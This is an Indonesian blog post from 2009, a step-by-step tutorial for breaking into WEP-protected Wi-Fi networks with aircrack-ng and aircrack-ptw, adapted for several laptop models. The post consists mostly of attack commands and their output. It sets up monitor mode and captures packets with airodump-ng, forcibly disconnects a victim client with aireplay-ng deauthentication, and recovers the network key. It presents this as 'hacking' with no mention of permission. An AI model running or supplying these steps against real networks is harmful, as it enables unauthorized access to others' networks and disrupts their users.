hack wifi dengan AIRCRACk

Selasa, 22 Desember 2009

Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:

ACER 4520, OS Linux Mint Elyssa

Step 1 : Setting wireless card

$ sudo airmon-ng stop ath0

kalau pake “stop” masih “monitor mode disabled”, ganti dengan ” .. start ath0″

kemudian masukkan

$ iwconfig

Sistem harus merespon sebagai berikut :

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏

Step 2 : Start wireless card

$  airmon-ng start wifi0

“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet

respon sistem harus sebagai berikut:

Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏

kemudian masukkan

$ iwconfig

dan pastikan bahwa resppon sistem sebagai berikut

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”" Nickname:”"
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Step 3 : Jalankan airodump-ng

airodump-ng digunakan untuk mengcapture paket dari akses point

$ sudo airodump-ng –channel X –write prefix_for_capture_file interface

misal

$ sudo airodump-ng –channel 3 –write tes ath0

“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.

untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas

$ airodump-ng –write tes ath0

Step 4 : Deauthenticate Clients(optional)

tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.

$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang

misal

$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0

* -a BSSID/Mac address akses point
* -c MAC Address client

* 15 jumlah paket yang dikirim

Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.

$ sudo aircrack-ptw tes-01.cap

atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng

$ sudo aircrack-ng -z tes-01.cap -b mac_ssid

misal

$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx

contoh output :

i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.

Aircrack-ng 1.0 beta1

[00:00:00] Tested 81 keys (got 21872 IVs)

KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)

KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan

ACER 4920, OS:lINUX UBUNTU

Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi

$ sudo airmon-ng start wlan0

untuk langkah selanjutnya sama dengan ACER 4520

BenQ S53W,OS LINUX UBUNTU

pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi

$ airmon-ng start eth1

Selamat mencoba

Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”

0 komentar:

 
 
 
 
Copyright © H3ndr4 blog